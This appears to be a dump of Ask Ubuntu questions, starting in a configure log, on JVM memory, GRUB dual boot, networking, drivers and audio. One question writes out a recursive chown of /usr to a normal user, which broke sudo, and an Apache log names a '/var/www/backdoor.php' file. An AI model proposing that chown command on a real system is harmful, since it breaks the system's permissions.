the linker ( /usr/bin/ld -m elf_i386 ) is gnu ld ... yes checking whether the g++ -m32 linker ( /usr/bin/ld -m elf_i386 ) supports shared libraries ... yes checking for g++ -m32 option to produce pic ... -fpic -dpic checking if g++ -m32 pic flag -fpic -dpic works ... yes checking if g++ -m32 static flag -static works ... yes checking if g++ -m32 supports -c -o file.o ... yes checking if g++ -m32 supports -c -o file.o ... ( cached ) yes checking whether the g++ -m32 linker ( /usr/bin/ld -m elf_i386 ) supports shared libraries ... yes checking dynamic linker characteristics ... ( cached ) gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking for a sed that does not truncate output ... ( cached ) /bin/sed checking for clock_gettime in -lrt ... yes checking for dlfcn.h ... ( cached ) yes checking for dlsym in -ldl ... yes checking x11/xlib.h usability ... yes checking x11/xlib.h presence ... yes checking for x11/xlib.h ... yes checking for x11/xutil.h ... yes checking for xopendisplay in -lx11 ... no configure : error : required library missing
347590	usb3 ports does not work on ubuntu 12.04 ?	on my desktop computer 4 of the usb3 ports are not working . if i plug any device in , it gets electricity but system does not mount the memory . i run usb-devices and saw that the devices are shown by the system . do you have any suggestion to get away the problem ?
347591	how do i control the vmem when forking , as i 'm getting different results on 10.04 lts and 12.04 lts ?	expected behavior ( ubuntu 10.04 lts ) : mike @ boontoo10 : ~ $ java -version java version `` 1.6.0_45 '' java ( tm ) se runtime environment ( build 1.6.0_45-b06 ) java hotspot ( tm ) 64-bit server vm ( build 20.45-b01 , mixed mode ) mike @ boontoo10 : ~ $ java -xmx512m -xms512m -jar forker.jar 10000000 20 xmx512m xms512m output of `` top '' : 1928 mike 20 0 694m 54m 8624 s 6 5.4 0:00.18 java 1933 mike 20 0 694m 54m 8648 s 6 5.4 0:00.18 java 1935 mike 20 0 694m 54m 8648 s 6 5.4 0:00.18 java 1939 mike 20 0 694m 54m 8648 s 5 5.4 0:00.16 java ( the java7 output looks like this on 10.04 ) : mike @ ubuntu10java7 : ~ $ java -versionjava version `` 1.7.0_40 '' java ( tm ) se runtime environment ( build 1.7.0_40-b43 ) java hotspot ( tm ) 64-bit server vm ( build 24.0-b56 , mixed mode ) 2106 mike 20 0 734m 57m 9876 s 4 2.8 0:00.25 java 2091 mike 20 0 734m 57m 9876 s 3 2.8 0:00.26 java 2100 mike 20 0 734m 57m 9876 s 3 2.8 0:00.25 java 2112 mike 20 0 734m 57m 9876 s 3 2.8 0:00.24 java 2097 mike 20 0 734m 57m 9876 s 3 2.8 0:00.24 java new behavior ( ubuntu 12.04 lts ) : mike @ boontoo12 : ~ $ java -version java version `` 1.6.0_45 '' java ( tm ) se runtime environment ( build 1.6.0_45-b06 ) java hotspot ( tm ) 64-bit server vm ( build 20.45-b01 , mixed mode ) mike @ boontoo12 : ~ $ java -xmx512m -xms512m -jar forker.jar 10000000 20 xmx512m xms512m output of `` top '' : 20697 mike 20 0 1405m 54m 8488 s 5 1.4 0:00.18 java 20669 mike 20 0 1405m 54m 8492 s 5 1.4 0:00.18 java 20691 mike 20 0 1405m 54m 8492 s 5 1.4 0:00.17 java 20658 mike 20 0 1405m 54m 8492 s 5 1.4 0:00.17 java update : new behavior ( ubuntu 12.04 lts w/ java 7 ) : mike @ boontoo12java7 : ~ $ java -version java version `` 1.7.0_40 '' java ( tm ) se runtime environment ( build 1.7.0_40-b43 ) java hotspot ( tm ) 64-bit server vm ( build 24.0-b56 , mixed mode ) output of `` top '' : 4166 mike 20 0 1438m 56m 9572 s 7 2.8 0:00.20 java 4169 mike 20 0 1438m 56m 9572 s 7 2.8 0:00.20 java 4182 mike 20 0 1438m 56m 9572 s 7 2.8 0:00.20 java 4076 mike 20 0 1438m 56m 9572 s 6 2.8 0:00.19 java 4100 mike 20 0 1438m 56m 9572 s 6 2.8 0:00.19 java ctd ... 12.0.4 with openjdk 6 , similar problem : mike @ boontoo12 : ~ $ java -version java version `` 1.6.0_27 '' openjdk runtime environment ( icedtea6 1.12.6 ) ( 6b27-1.12.6-1ubuntu0.12.04.2 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode ) output of `` top '' : 6690 mike 20 0 1500m 55m 8920 s 7 1.4 0:00.22 java 6692 mike 20 0 1500m 55m 8920 s 7 1.4 0:00.21 java 6697 mike 20 0 1500m 55m 8920 s 7 1.4 0:00.21 java 6701 mike 20 0 1500m 51m 8684 s 7 1.3 0:00.21 java 6725 mike 20 0 1500m 55m 8920 s 7 1.4 0:00.21 java to preempt , here 's the openjdk 7 attempt : mike @ boontoo12 : ~ $ java -version java version `` 1.7.0_25 '' openjdk runtime environment ( icedtea 2.3.10 ) ( 7u25-2.3.10-1ubuntu0.12.04.2 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode ) output of `` top '' : 9327 mike 20 0 1534m 57m 9296 s 6 1.4 0:00.25 java 9331 mike 20 0 1534m 57m 9276 s 6 1.4 0:00.25 java 9344 mike 20 0 1534m 57m 9300 s 6 1.4 0:00.25 java 9347 mike 20 0 1534m 57m 9300 s 6 1.4 0:00.25 java 9323 mike 20 0 1534m 57m 9300 s 6 1.4 0:00.25 java 9284 mike 20 0 1534m 57m 9308 s 5 1.4 0:00.24 java 9285 mike 20 0 1534m 57m 9300 s 5 1.4 0:00.24 java 9336 mike 20 0 1534m 57m 9276 s 5 1.4 0:00.23 java 9277 mike 20 0 1534m 57m 9300 s 5 1.4 0:00.24 java as you can see , the vmem utilization has doubled . i 'm using the exact same java/jre binary ( and jdk ) , the only difference being the version of ubuntu . i 'm hoping to get this program back to ~694m of vmem used . how do i do that ? what do i even search for ? please do n't suggest that i structure my program differently . this is the smallest toy-example i could write to reproduce a gigantic problem reflected in some apache software , but this feels like a kernel/libs problem to me . here 's the code to duplicate , and the link where all this is summarized in a gist : https : //gist.github.com/michael-trelinski code : package com.satoricode.forker ; import java.util.concurrent.executorservice ; import java.util.concurrent.executors ; public class forkit { public static void main ( string [ ] args ) throws interruptedexception { int arraysize = integer.parseint ( args [ 0 ] ) ; system.out.print ( `` filling up some memory ... `` ) ; int [ ] arr = fillitup ( arraysize ) ; system.out.println ( `` '' + arr.length + `` done . `` ) ; if ( args.length == 1 ) { system.out.println ( `` i 'm the fork ! `` ) ; thread.sleep ( 10 * 1000 ) ; } else { // i 'm the master int numforks = integer.parseint ( args [ 1 ] ) ; string stackcommand = args [ 2 ] ; string stackinitcommand = args [ 3 ] ; executorservice pool = executors.newfixedthreadpool ( numforks ) ; system.out.println ( `` launching `` + numforks + `` forks with array size `` + arraysize + `` with - '' + stackcommand + `` - '' + stackinitcommand ) ; for ( int i = 0 ; i < numforks ; i++ ) pool.execute ( new forkrunner ( arraysize , stackcommand , stackinitcommand ) ) ; pool.shutdown ( ) ; system.out.print ( `` waiting for pool to finish '' ) ; while ( ! pool.isterminated ( ) ) { thread.sleep ( 50 ) ; system.out.print ( `` . `` ) ; } system.out.println ( ) ; system.out.println ( `` done\n '' ) ; } } private static int [ ] fillitup ( int total ) { int [ ] arr = new int [ total ] ; for ( int i = 0 ; i < total ; i++ ) arr [ i ] = i ; return arr ; } } package com.satoricode.forker ; import java.io.ioexception ; import java.io.inputstream ; public class forkrunner implements runnable { private string stackcommand ; private int arraysize ; private string stackinitcommand ; public forkrunner ( int arraysize , string stackcommand , string stackinitcommand ) { this.arraysize = arraysize ; this.stackcommand = stackcommand ; this.stackinitcommand = stackinitcommand ; } @ override public void run ( ) { try { string command = `` java - '' + stackcommand + `` - '' + stackinitcommand + `` -jar forker.jar `` + arraysize ; system.out.println ( `` executing : `` + command ) ; process proc = runtime.getruntime ( ) .exec ( command ) ; inputstream input = proc.getinputstream ( ) ; inputstream error = proc.geterrorstream ( ) ; stringbuilder sb = new stringbuilder ( ) ; int c = -1 ; while ( ( c = input.read ( ) ) ! = -1 ) { sb.append ( ( char ) c ) ; } while ( ( c = error.read ( ) ) ! = -1 ) { sb.append ( ( char ) c ) ; } system.out.println ( sb.tostring ( ) ) ; } catch ( ioexception e ) { e.printstacktrace ( ) ; } } }
347595	how do i change ctrl+c and ctrl+v shortcuts ?	some time ago , i decided to go with dworak keyboard layout . which i am mostly happy about . but what bothers me is that ctrl+c and ctrl+v shortcuts ( and probably many more , but these are the ones that bother me the most ) are designed to be used with querty layout . on dworak , they c an v are located on the right side of the keyboard . so i 'd like to be able to change ctrl+c into ctrl+j and ctrl+v into ctrl+k . on windows i can do it with autohotkey and a template . what is the best way to do it on ubuntu ?
347597	how can i change owner back to root ?	so , i did a stupid thing ... i was installing some software ( java se 7 , if you must know ) from a tarball , and i got tired of using sudo , so i went and changed the owner of my /usr directory to myself . $ sudo chown -r sammy /usr whoops ! since sudo lives in /usr/bin/ , it also changed owner . now , i ca n't use it anymore . have i accidentally been caught in a sudo-catch 22 ? i ca n't use apt-get install or any number of other essential features of my shell environment . $ sudo sudo : must be setuid root is there a way to change the owner of this directory ( and subdirectories , too ) back to root ?
347598	add windows 8 which is on a ssd tu the bootloader which is on the hdd	i have a big problem and i hope you guys can help me ... i have a msi gt60-2od which has ssd and hdd . my windows 8 is installed on the ssd and now i want to install ubuntu and kali on the hdd ... and i did ! ! ! but the problem is with the bootloader ... the bootloader is installed on master partition of hdd ( it did n't let me to install it on ssd ! ) and it can see both kali and ubuntu but it does n't see the windows which is on the ssd . how can i add my windows to the bootloader menu ? the bootloader is grub 1.99 and the ubuntu is 12.04 lts thanks a lot ... i need your help ... edit : in my bios menu i have 3 options for boot mode : uefi with csm 2.legacy 3.uefi the only mode that allows me to boot from cd/dvd is legacy so i am trying to install my os in this mode
347602	i ca n't set terra 's show/hide keyboard shorcut	i 'm using ubuntu 13.04 with terra terminal an i want to use alt+1 to toggle terra 's visibility . i do right click on terminal - > preferences - > keyboard shortcuts and i change `` hide/show terra '' option from f12 to alt+1 . then , reboot and toggle is not working . the same happens with yakuake . i think that i 'm crashing with a system shortcut . i tried to unset alt+1 system shortcut using : system settings - > keyboard - > shortcuts . installing compizconfig-settings-manager - > general options - > key bindings . but i ca n't find this particular shortcut on both cases .
347607	subwoofer not working in hp pavilion m6-1002tx	i have hp pavilion m6-1002tx dual boot ( windows 7 home premium & ubuntu 13.04 ) ,64-bit . i find no sign of a working subwoofer , at back side of my laptop . also in all setting- > sounds , the option of woofer is inactive . as i 'm new to ubuntu , i expect something to set it working , with help of extra sound drivers to be installed , if needed so ! please help !
347611	how can i install nvidia 319.17 without bumblebee ?	i would like to install the nvidia 319.17 driver , but i do n't really know how to open the run file . could you tell me what i have to do in detail ? if something goes wrong , how can i go back ?
347615	setting up directory aliases in pure ftpd on ubuntu 12.04 lts	okay , so i have pure ftpd up and running on ubuntu 12.04 and symlinks work , but , not for ipod touch so what i need to do is setup directory aliases . i have read the information on how to do this and i still ca n't make it work . what i did was change the /etc/pure-ftpd/pureftpd-dir-aliases file by adding the alias /home/user/user/x and on the line below it the directory path /media/x after doing this i restarted the server and it does not show as a path when i login . what am i doing wrong now ?
347617	how to test a usb device created using startup disk creator without restarting ?	i made an ubuntu 13.04 64-bit bootable usb device using startup disk creator . however , it did not give me a message that the device is bootable and i could test it , which it usually gives if the disk was successfully created as a bootable device . is there anyway , including using virtualization softwares , that i could test this bootable device without having to reboot my machine ( i am too lazy to do that : -p ) ?
347618	manually connecting to a network via terminal	i currently only have wired internet via a cable modem connected to an airlink 101 asw105 switch . it works fine for my wife 's mac . however , my laptop does not connect ; i 've tried connecting via eth0 and tried creating a new wired connection- but both fail to connect . it 's not a hardware problem with my cables or the network hardware , as my wife 's machine has been used to test all cables and ports etc , other than that of my laptop . so , how can i go about connecting to this network via commands on the terminal ? if you need more information please fire away . edit : i added some more info based on the comments . i have only added the wired devices comments for nm-tool . ping -c2 4.2.2.2 connect : network is unreachable nm-tool enter code here device eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : wired driver : tg3 state : disconnected default : no hw address : 00:22:19 : f2:36:3b capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on
347619	keyboard layout ubuntu 13.04	i have ubuntu 13.04 and none of the keyboard layout that comes with wbuntu match with my keyboard layout . i am talking about the help key , brightness keys , touch-pad on/off , backward , play , forward , mute and wireless on/off . in my keyboard layout , to use f1 key i need to press 'fn+help key ' . can anyone help me ?
347621	windows 8 wo n't boot after installing ubuntu 13.04	i installed ubuntu 13.04 today and it works fine , but i ca n't boot windows 8 anymore . ( i 've installed it on legacy mode . ) it says `` invalid efi file path '' . what could i do ? here is my boot info : http : //paste.ubuntu.com/6129388/
347623	wired network problem 13.04	i used to not be able to connect with my wired connection on ubuntu 13.04 . it worked magically sometimes and i clicked around in the settings . now it 's working consistently . i remember playing around with vpn but i did n't change any major settings . as i want to install another system now , i want to know what it is in order to figure out , what to do in the future . as i boot into linux mint on a usb i 'm having the same problem , there i have not been able to figure out what to do in order to get it working . i 'm connecting to a dorm network . other people living here seem to have no problem connecting with their windows machines . also there are no torrent files/connections working . i see connecting peers for some files , but it does n't start seeding . i hugely appreciate any help . thanks in advance ! the commands were run on the consistently working machine on ubuntu 13.04 on a thinkpad x230i . lspci | grep ethernet 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) dmesg | grep eth [ 1.015232 ] e1000e 0000:00:19.0 eth0 : ( pci express:2.5gt/s : width x1 ) 3c:97:0e : b7:00:9c [ 1.015235 ] e1000e 0000:00:19.0 eth0 : intel ( r ) pro/1000 network connection [ 1.015273 ] e1000e 0000:00:19.0 eth0 : mac : 10 , phy : 11 , pba no : 1000ff-0ff [ 14.138549 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 15.585540 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 15.585915 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 17.134208 ] e1000e : eth0 nic link is up 100 mbps full duplex , flow control : none [ 17.134215 ] e1000e 0000:00:19.0 eth0 : 10/100 speed : disabling tso [ 17.134248 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready ifconfig eth0 eth0 link encap : ethernet hwaddr 3c:97:0e : b7:00:9c inet addr:141.70.83.230 bcast:141.70.83.255 mask:255.255.255.0 inet6 addr : fe80 : :3e97 : eff : feb7:9c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:33801 errors:0 dropped:0 overruns:0 frame:0 tx packets:19683 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:31126117 ( 31.1 mb ) tx bytes:3483515 ( 3.4 mb ) interrupt:20 memory : f2500000-f2520000
347628	http status code 500 upon accessing localhost project	i just installed lamp on my ubuntu and upon accessing a file which i am certain that is with valid syntax , i get the 500 internal error status code . i chmodded the directory for the projects ( /var/www/ ) and tried nearly everything i could find on the web related to that issue . a bit of information : i 'm running ubuntu 12.10 i 'm using lamp i 've cleaned my apache error log so that to see the exact problem upon trying to access the project [ thu sep 19 21:50:17 2013 ] [ error ] [ client 127.0.0.1 ] php warning : unknown : failed to open stream : permission denied in unknown on line 0 [ thu sep 19 21:50:17 2013 ] [ error ] [ client 127.0.0.1 ] php fatal error : unknown : failed opening required '/var/www/backdoor.php ' ( include_path= ' . : /usr/share/php : /usr/share/pear ' ) in unknown on line 0 this also happens on small projects and is not related to the source code ( that i 'm certain about ) thanks in advance for any answers/solutions .
347630	split a variable line by line	i initialize variable like this : dmesgdevs= $ ( dmesg | grep idvendor ) and want to print it line by line and then check if theres is word in particular line .
347632	openvpn seems to not allow webpage loads	on my openvpn tunnel into my home router ( running asuswrt-merlin ) , when i try to load a webpage in firefox , it just seems like it 's trying to load the page , but has no success . rdp connections appear to work perfectly , as does ping , as does the popup dialog for logging into a website , but after the credentials are put in , it does n't load the page . is this a default route , or gateway issue ? if so , how would i fix it ? i 'm using network-manager-openvpn to configure my vpn connection . it may be the extremely restrictive network that i 'm currently on , but the vpn definitely works , but not for loading pages .
347636	in ubuntu 12.04 , gnome3 , alt+f2 no longer works to get a run prompt	reiteration : my computer is using ubuntu 12.04 with the gnome3 desktop . something you should know : i 've searched through the other questions on this subject and could n't find one related to the problem i 'm experiencing . in other words , following other suggestions always leads to another problem the other suggestions did n't answer so i 'm reiterating the question with extra information here . description of problem : i was trying out some development packages which removed a bunch of stuff . after this i reinstalled gnome , and gnome-common , but now the computer has no working alt+f2 shortcut . things i 've tried : in the shortcut menu ( system settings -- > keyboard -- > shortcuts ) , when i attempt to make a custom shortcut it just brings up the menu for creating a custom entry with no option to set the key-binding for the shortcut . furthermore when i look in the dconf-editor ( which was missing and had to be reinstalled ) there is no `` wm '' entry which i 'm assuming is short for `` window manager '' which is supposedly where i would look to find keyboard shortcuts . the gconf-editor ( also missing and needed a reinstall ) is similarly strange so i took a closer look ... [ update ! ] i 've deleted the original question due to posting it before i had a chance to thoroughly vet the problem . chalk this up to hallucinations due to only a few hours of sleep in the past 48 hours . i did n't recognize the key when i was stairing right at it . final solution : the entry located in [ system settings -- > keyboard -- > shortcuts -- > system -- > `` show the run command prompt '' ] was disabled . enabling this entry allowed me to set its key-binding back to alt+f2 and that key combination now executes as it normally should . current personal status : fail = +1 , going back to sleep for a reboot .
347637	how to install d-link dwm-156 3g modem ubuntu 13.04	i bought a new d-link 3g modem and it said it supports linux . but after i installed it , i still canât make the device work on ubuntu 13.04 . i used the .deb file from the d-link modem 3g_modem_connect_d300_i386.deb ( from the modem itself ) but i was unable to configure it . i searched the internet , they use dlinkusbmodem.deb file , which is a file from 1 year ago . even after i dpkg it , i still donât know how to proceed . i viewed this youtube and it does n't work with this file version .
347638	internet dropout certain wifi	weird issue , running ubuntu 13.04 . on one particular network my internet drops out , wifi stays connected but after around 1 min the internet dropps out . note : i dual boot into windows and windows works fine on that network . and on other wifi networks ubuntu works fine . thoughts >
347639	how can i fix could not load modules.dep when i try to setup my wireless drivers ?	i am trying to set up my wireless card drivers on kubuntu 12.04 . this is what i 'm doing : sudo apt-get install linux-firmware-nonfree sudo modprobe b43 dmesg |grep -e b43 -e bcma but i get this error that i do n't understand : fatal : could not load /lib/modules/3.2.0-48-generic/modules.dep : no such file or directory what does that error mean and how can i fix this ?
347640	network manager deleted	i do not have a network manager on computer so i am unable to access internet . how can i install it using .deb packages ? i am running 64-bit 13.04 . i was trying how do i re-install network manager without an internet connection ? but it did n't install network manager and network-manager-gnome . it said dependency not satisfiable : libgnome-bluetooth7 ( > =2.27.8 )
347643	is there a way to tell when i unstalled a program ?	is there a way to tell when i unstalled a program ? i uninstalled a program a whle back , maybe 6 months ago i think , im wondering if this is recorded somewhere , maybe with what version i unistalled and other details . is there a way to find that info ?
347647	add back usb boot option in bios	i have a samsung notebook . it came with windows 8 and uefi . i was able to do dual boot with ubuntu 13.04 using usb installation . i had some issues with the boot , so i ran boot-repair and everything worked fine . however , i want to reinstall my ubuntu since i have some problems with the graphical drivers . then i looked at the boot options and i do n't have the usb boot entry anymore . i tried to create a new boot entry using efibootmgr , but that did n't work , it looks like efibootmgr is not able to add entries in ubuntu 13.04 . when i run efibootmgr , it show this : bootcurrent : 0004 timeout : 0 seconds bootorder : 0004,0001,0005,0006,0007,0000,0002,0003 boot0000* windows boot manager boot0001* windows boot manager boot0002 uefi : ip4 realtek pcie gbe family controller boot0003 uefi : ip6 realtek pcie gbe family controller boot0004* ubuntu boot0005* ubuntu boot0006* windows boot manager boot0007* ubuntu i tried to load the default options , but it did n't change the boot list . i know i can re-install ubuntu in different ways , but i would love to have my boot list with the usb option again . just clarifying that 's not a bios issue . this was working before installing ubuntu . i was able to use usb stick to install ubuntu . this is happening with other people as well . please look at the problem more further before put on hold
347648	what are cve security updates and who issues them ?	just a couple quick questions . hope a couple wise owls might be able to answer ; ) i used to apply updates through the terminal without any care , since i do n't use any ppa 's or use any untrusted apps but lately i became interested in ubuntu bugs , their fixes and most importantly the changes that would be made to my system . so , i found it easier to use the 'update manager ' so i could use the link in the 'changes ' section to access the 'launchpad ' page that discusses these issues . today when prompted for some specific updates , instead of being directed to a 'launchpad ' page that i was accustomed to , i was directed to an unknown 'mitre.org ' page . screenshots : update manager - changes mitre i 've searched the askubuntu site , as well as others , yet i 've only found 1 thread that can come close to answering my questions . it was marked as [ solved ] , yet the op 's original question was never answered . http : //ubuntuforums.org/showthread.php ? t=1586903 & s=e92cb71ffd1f1299c25cb407f5a4ff6e so to my questions ... what are cve security updates and who issues them ? why am i directed to an unknown website ( to me anyways ) , that is funded by a government agency ( look closely on the bottom of the 'mitre ' screenshot ) , when inquiring about the aforementioned updates ?
347649	computer crash question	i was running ubuntu 12.04 on my toshiba laptop last night . i installed it about 6 days ago . yesterday i made some changes to get rid of unity and use gnome classic . everything was fine all day and night until i rebooted then i got the following error : could not write bytes : broken pipe : no suitable module for running kernel found starting the winbind daemon winbind amed disabled : edit /etc/default/sancd i had to do a complete re-install this morning . can anyone explain this error to me and why it might have happened so i can avoid it in the future ?
347650	mobile media converter stoped conversion	i love this super handy and versatile tool mobile media converter but after the last upgrade to mmc_1.8.2_amd64.deb , it fails to convert any video formats . i tried to reinstall it several times but with no avail . appreciate your hints to fix it . p.s . just noticed that medibuntu came to an end and mmc depends on it . so what to do now ?
347651	how can i debug a juju client command ?	i 'm having issues bootstrapping with juju , where are logs that i can review ?
347653	upgrade 11 to 12 still boots 11	i just upgraded my acer aspire one from 11 to 12.04 , but while the desktop says 12.04 , and trying to redo the upgrade says `` you 're already got 12 installed '' , the grub menu only has 11.04 options and i get a 2.6 kernel , not a 3.8 . in particular , the atheros driver is n't getting loaded . am i going to have to reinstall from scratch ?
347654	made huge mistake with dd , ubuntu does not boot	i 've made a great mistake . i was trying to burn an iso image onto a usb stick with dd . i chose sda8 which appeared to be my usb stick and i ran the command with sudo . now everything has gone mad and i can not boot into ubuntu or windows that i had installed along it . when i start my laptop now , it just says : error : unknown filesystem . grub rescue > i have very important data on my drive and i am going crazy at the moment . can somebody please help me . i would appreciate it immensely .
347656	nonblocking bash commands ?	so i just created the .bash_aliases and wrote the following : callnotepad ( ) { wine c : \\program\ files\\notepad++\\notepad++.exe $ 1 } alias notepad++=callnotepad now whether notepad++ is already running or not , if it is not it does open notepad++ and either way , it opens whatever file i specify when i call notepad++ somefile however , if notepad++ was not running prior to that command , it gives me a fixme : ole : remunknown_queryinterface no interface for iid { 00000019-0000-0000-c000-000000000046 } and then blocks the calling terminal for as long as notepad is running . how would i implement that alias correctly ? for i have no idea what that fixme is supposed to tell me . also , i would prefer not having to open a second terminal after opening a file in notepad++ ( ctrl+c reenables the terminal but closes notepad++ ) .
347661	installation do n't detect hdd/ssd in a sony vaio ultabrook svt3115fls	i was trying to install ubuntu 12.04 on a sony vaio ultabrook svt13115fls , it was going ok , but when i choose to install , then i choose the language , then it did n't display the hdd where i was going to install ubuntu , the only drive that recognize was the usb key ( the installation ) , let me tell you that my vaio has a 320 gb hdd and a 32 gb sdd , if somebody can help me with this issue and i would like to install it in dual boot with windows 7 that its already installed .
347662	issue running update on server 13.04	i 'm running into an issue when trying a apt-get update & & apt-get upgrade it fails with the following error : dpkg : error processing systemd-services ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . errors were encountered while processing : systemd-services e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i try to do a force install of systemd-services , and get the exact same error how can i fix this ?
347665	pulseaudio keeps on auto adjusting my mic and speaker volume	i have tried everywhere but all forums seem to get stuck on a problem with skype or google-talk . i am trying to test my speaker and mic using the system testing application . when trying to test my mic it seems to auto adjust my volume so i hear almost nothing . both the mic and speaker volume gets adjusted . i have tried all kinds of option such as analog stereo duplex etc . etc . i have also tried to see if adjusting from alsamixer but even that does not seem to work . i am running xubuntu 12.04 with dell external speakers and a logic3 mic . they all seemed to work fine before ... aplay -l gives : **** list of playback hardware devices **** card 0 : v8237 [ via 8237 ] , device 0 : via 8237 [ via 8237 ] subdevices : 4/4 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 subdevice # 2 : subdevice # 2 subdevice # 3 : subdevice # 3 card 0 : v8237 [ via 8237 ] , device 1 : via 8237 [ via 8237 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 pulseaudio -- dump-conf # # # read from configuration file : /etc/pulse/daemon.conf # # # daemonize = no fail = yes high-priority = yes nice-level = -11 realtime-scheduling = yes realtime-priority = 5 allow-module-loading = yes allow-exit = yes use-pid-file = yes system-instance = no local-server-type = user cpu-limit = no enable-shm = yes flat-volumes = no lock-memory = no exit-idle-time = 20 scache-idle-time = 20 dl-search-path = /usr/lib/pulse-1.1/modules default-script-file = /etc/pulse/default.pa load-default-script-file = yes log-target = auto log-level = notice resample-method = speex-float-1 enable-remixing = yes enable-lfe-remixing = no default-sample-format = s16le default-sample-rate = 44100 default-sample-channels = 2 default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10 enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 deferred-volume-extra-delay-usec = 0 shm-size-bytes = 0 log-meta = no log-time = no log-backtrace = 0 rlimit-fsize = -1 rlimit-data = -1 rlimit-stack = -1 rlimit-core = -1 rlimit-rss = -1 rlimit-as = -1 rlimit-nproc = -1 rlimit-nofile = 256 rlimit-memlock = -1 rlimit-locks = -1 rlimit-sigpending = -1 rlimit-msgqueue = -1 rlimit-nice = 31 rlimit-rtprio = 9 rlimit-rttime = 1000000 amixer -c 0 simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 31 mono : playback 31 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'master mono',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 31 mono : playback 0 [ 0 % ] [ -46.50db ] [ off ] simple mixer control 'headphone',0 capabilities : pvolume pswitch pswitch-joined penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 0.00db ] [ on ] front right : playback 31 [ 100 % ] [ 0.00db ] [ on ] simple mixer control '3d control - center',0 capabilities : volume volume-joined penum playback channels : mono capture channels : mono limits : 0 - 15 mono : 0 [ 0 % ] simple mixer control '3d control - depth',0 capabilities : pvolume pvolume-joined penum playback channels : mono limits : playback 0 - 15 mono : playback 0 [ 0 % ] simple mixer control '3d control - switch',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'pcm',0 capabilities : pvolume pswitch pswitch-joined penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 27 [ 87 % ] [ 6.00db ] [ on ] front right : playback 27 [ 87 % ] [ 6.00db ] [ on ] simple mixer control 'front',0 capabilities : pvolume pswitch pswitch-joined penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 0.00db ] [ on ] front right : playback 31 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'surround',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 0.00db ] [ on ] front right : playback 31 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'center',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 31 mono : playback 31 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'center/lfe exchange',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'lfe',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 31 mono : playback 31 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'line',0 capabilities : pvolume pswitch pswitch-joined cswitch cswitch-exclusive penum capture exclusive group : 0 playback channels : front left - front right capture channels : front left - front right limits : playback 0 - 31 front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] capture [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] capture [ off ] simple mixer control 'cd',0 capabilities : pvolume pswitch pswitch-joined cswitch cswitch-exclusive penum capture exclusive group : 0 playback channels : front left - front right capture channels : front left - front right limits : playback 0 - 31 front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] capture [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] capture [ off ] simple mixer control 'mic',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined cswitch cswitch-exclusive penum capture exclusive group : 0 playback channels : mono capture channels : front left - front right limits : playback 0 - 31 mono : playback 31 [ 100 % ] [ 12.00db ] [ off ] front left : capture [ on ] front right : capture [ on ] simple mixer control 'mic boost ( +20db ) ',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'mic select',0 capabilities : enum items : 'mic1 ' 'mic2' item0 : 'mic1' simple mixer control 'video',0 capabilities : cswitch cswitch-exclusive penum capture exclusive group : 0 capture channels : front left - front right front left : capture [ off ] front right : capture [ off ] simple mixer control 'phone',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined cswitch cswitch-exclusive penum capture exclusive group : 0 playback channels : mono capture channels : front left - front right limits : playback 0 - 31 mono : playback 0 [ 0 % ] [ -34.50db ] [ off ] front left : capture [ off ] front right : capture [ off ] simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] simple mixer control 'iec958 output',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'iec958 playback ac97-spsa',0 capabilities : volume volume-joined penum playback channels : mono capture channels : mono limits : 0 - 3 mono : 3 [ 100 % ] simple mixer control 'beep',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 15 mono : playback 0 [ 0 % ] [ -45.00db ] [ off ] simple mixer control 'aux',0 capabilities : pvolume pswitch pswitch-joined cswitch cswitch-exclusive penum capture exclusive group : 0 playback channels : front left - front right capture channels : front left - front right limits : playback 0 - 31 front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] capture [ off ] front right 